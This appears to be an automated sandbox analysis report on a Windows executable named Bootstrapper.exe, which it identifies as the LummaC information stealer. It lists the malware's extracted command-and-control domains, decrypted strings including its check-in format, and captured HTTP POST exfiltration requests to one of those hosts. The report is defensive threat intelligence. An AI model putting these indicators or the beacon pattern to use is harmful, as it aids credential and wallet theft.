Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bootstrapper.exe

Overview

General Information

Sample name:Bootstrapper.exe
Analysis ID:1589391
MD5:a9370df5fb60672577fd727e3e798e75
SHA1:a5b4a8c7caf397a3629e0156da2594de1b657776
SHA256:481a9e582ab314faa2ab950fc99ab39fc35c071bfaf45871089892129be66d55
Tags:exeuser-zhuzhu0009
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Bootstrapper.exe (PID: 1036 cmdline: "C:\Users\user\Desktop\Bootstrapper.exe" MD5: A9370DF5FB60672577FD727E3E798E75)
    • WerFault.exe (PID: 3512 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 1900 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["savorraiykj.lat", "washyceehsu.lat", "kickykiduz.lat", "jubbenjusk.biz", "miniatureyu.lat", "bloodyswif.lat", "finickypwk.lat", "shoefeatthe.lat", "leggelatez.lat"], "Build id": "HpOoIh--2a727a032c4d"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000002.2339254428.0000000000802000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x14f8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      Process Memory Space: Bootstrapper.exe PID: 1036JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Bootstrapper.exe PID: 1036JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Bootstrapper.exe PID: 1036JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            Click to see the 1 entries

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-12T07:10:18.418393+010020283713Unknown Traffic192.168.2.649710172.67.219.181443TCP
            2025-01-12T07:10:19.439977+010020283713Unknown Traffic192.168.2.649711172.67.219.181443TCP
            2025-01-12T07:10:20.812997+010020283713Unknown Traffic192.168.2.649712172.67.219.181443TCP
            2025-01-12T07:10:22.083957+010020283713Unknown Traffic192.168.2.649714172.67.219.181443TCP
            2025-01-12T07:10:23.471175+010020283713Unknown Traffic192.168.2.649721172.67.219.181443TCP
            2025-01-12T07:10:25.479834+010020283713Unknown Traffic192.168.2.649737172.67.219.181443TCP
            2025-01-12T07:10:26.543060+010020283713Unknown Traffic192.168.2.649743172.67.219.181443TCP
            2025-01-12T07:10:27.536844+010020283713Unknown Traffic192.168.2.649749172.67.219.181443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-12T07:10:18.931017+010020546531A Network Trojan was detected192.168.2.649710172.67.219.181443TCP
            2025-01-12T07:10:19.934991+010020546531A Network Trojan was detected192.168.2.649711172.67.219.181443TCP
            2025-01-12T07:10:27.969739+010020546531A Network Trojan was detected192.168.2.649749172.67.219.181443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-12T07:10:18.931017+010020498361A Network Trojan was detected192.168.2.649710172.67.219.181443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-12T07:10:19.934991+010020498121A Network Trojan was detected192.168.2.649711172.67.219.181443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-12T07:10:21.395869+010020480941Malware Command and Control Activity Detected192.168.2.649712172.67.219.181443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: Bootstrapper.exeAvira: detected
            Found malware configuration
            Source: 0.2.Bootstrapper.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["savorraiykj.lat", "washyceehsu.lat", "kickykiduz.lat", "jubbenjusk.biz", "miniatureyu.lat", "bloodyswif.lat", "finickypwk.lat", "shoefeatthe.lat", "leggelatez.lat"], "Build id": "HpOoIh--2a727a032c4d"}
            Multi AV Scanner detection for submitted file
            Source: Bootstrapper.exeVirustotal: Detection: 50%Perma Link
            Source: Bootstrapper.exeReversingLabs: Detection: 39%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Bootstrapper.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: finickypwk.lat
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: shoefeatthe.lat
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: savorraiykj.lat
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: kickykiduz.lat
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: miniatureyu.lat
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: leggelatez.lat
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: washyceehsu.lat
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: bloodyswif.lat
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: jubbenjusk.biz
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
            Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmpString decryptor: HpOoIh--2a727a032c4d

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\Desktop\Bootstrapper.exeUnpacked PE file: 0.2.Bootstrapper.exe.400000.0.unpack
            Source: Bootstrapper.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\Desktop\Bootstrapper.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49710 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49714 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49743 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49749 version: TLS 1.2

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 172.67.219.181:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 172.67.219.181:443
            Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 172.67.219.181:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 172.67.219.181:443
            Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49712 -> 172.67.219.181:443
            Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49749 -> 172.67.219.181:443
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: savorraiykj.lat
            Source: Malware configuration extractorURLs: washyceehsu.lat
            Source: Malware configuration extractorURLs: kickykiduz.lat
            Source: Malware configuration extractorURLs: jubbenjusk.biz
            Source: Malware configuration extractorURLs: miniatureyu.lat
            Source: Malware configuration extractorURLs: bloodyswif.lat
            Source: Malware configuration extractorURLs: finickypwk.lat
            Source: Malware configuration extractorURLs: shoefeatthe.lat
            Source: Malware configuration extractorURLs: leggelatez.lat
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 172.67.219.181:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 172.67.219.181:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 172.67.219.181:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49743 -> 172.67.219.181:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49721 -> 172.67.219.181:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49737 -> 172.67.219.181:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 172.67.219.181:443
            Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49749 -> 172.67.219.181:443
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: jubbenjusk.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: jubbenjusk.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TB978WPRBRXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12824Host: jubbenjusk.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=KF9G91EFCUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15058Host: jubbenjusk.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZSLO3EWW2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19916Host: jubbenjusk.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=BD17OYCX7FQFJZ65XNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1376Host: jubbenjusk.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=TPXM9QB19SRT6UAFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1106Host: jubbenjusk.biz
            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: jubbenjusk.biz
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: jubbenjusk.biz
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: jubbenjusk.biz
            Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: Bootstrapper.exe, 00000000.00000003.2278052852.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266468578.0000000000890000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218919187.0000000000890000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2289039973.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278363178.0000000000890000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266368056.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microh
            Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
            Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: Bootstrapper.exe, Bootstrapper.exe, 00000000.00000003.2268075830.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2289217054.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278052852.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266262477.00000000008D3000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278322139.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2288842178.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266314532.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2279169456.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2279121154.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278187542.00000000008D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/
            Source: Bootstrapper.exe, 00000000.00000003.2260094816.0000000002EFE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/2YmA
            Source: Bootstrapper.exe, 00000000.00000003.2268075830.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266262477.00000000008D3000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266314532.00000000008D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/Gsw
            Source: Bootstrapper.exe, 00000000.00000002.2339295599.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/Li
            Source: Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/S
            Source: Bootstrapper.exe, 00000000.00000003.2232704430.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2232633454.0000000002EFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/Y
            Source: Bootstrapper.exe, Bootstrapper.exe, 00000000.00000003.2289217054.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278052852.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278322139.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218919187.0000000000890000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2289039973.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278187542.00000000008D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/api
            Source: Bootstrapper.exe, 00000000.00000003.2278052852.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278322139.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278187542.00000000008D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/api1vk
            Source: Bootstrapper.exe, 00000000.00000003.2278322139.00000000008EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/apims
            Source: Bootstrapper.exe, 00000000.00000002.2339295599.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/apit
            Source: Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/f
            Source: Bootstrapper.exe, 00000000.00000003.2245574445.0000000002EFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/isg8orLIezaCPJdZDugx
            Source: Bootstrapper.exe, 00000000.00000003.2244666049.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/isg8orLIezaCPJdZDugxu
            Source: Bootstrapper.exe, 00000000.00000003.2218728998.00000000008D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/q
            Source: Bootstrapper.exe, 00000000.00000003.2289217054.00000000008DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz/w
            Source: Bootstrapper.exe, 00000000.00000003.2244898752.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2289039973.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.0000000000855000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2244666049.0000000002EF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://jubbenjusk.biz:443/api
            Source: Bootstrapper.exe, 00000000.00000003.2248201712.0000000003012000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: Bootstrapper.exe, 00000000.00000003.2248201712.0000000003012000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: Bootstrapper.exe, 00000000.00000003.2248103085.0000000002F27000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
            Source: Bootstrapper.exe, 00000000.00000003.2248201712.0000000003012000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
            Source: Bootstrapper.exe, 00000000.00000003.2248201712.0000000003012000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
            Source: Bootstrapper.exe, 00000000.00000003.2248201712.0000000003012000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
            Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
